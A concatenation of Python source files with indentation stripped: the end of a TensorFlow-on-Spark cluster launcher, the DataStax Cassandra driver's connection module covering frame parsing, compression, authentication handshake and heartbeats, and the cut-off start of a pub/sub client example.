if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, host=None):
Exception.__init__(self, message)
self.host = host
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, host, startup_version):
msg = "Unsupported protocol version on %s: %d" % (host, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, host)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
ssl_options = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False):
self.host = host
self.port = port
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
self.lock = RLock()
self.connected_event = Event()
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, host, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(host, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(host, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
def _connect_socket(self):
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.host)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.host, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.host, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.host, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.host)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.host)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None):
return self.wait_for_responses(msg, timeout=timeout)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.host)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.host)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.host))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
if self.authenticator:
log.warning("An authentication challenge was not sent, "
"this is suspicious because the driver expects "
"authentication (configured authenticator = %s)",
self.authenticator.__class__.__name__)
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.host, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.host))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.host)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.host, auth_response)
raise ProtocolError(msg % (self.host, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.host)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.host)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.host)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.host)
# make sure the owner sees this defunt/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
|
pubsub.py
|
import time
import threading
from space_api import API
api = API('books-app', 'localhost:4124')
pubsub = api.pubsub()
def on_receive(subject, msg):
print("received", subject, msg)
subscription = pubsub.subscribe("/subject/", on_receive)
print(subscription)
def publish():
for i in range(30):
msg = [1, "adf", 5.2, True, {"k": "v"}, [1, "b"]]
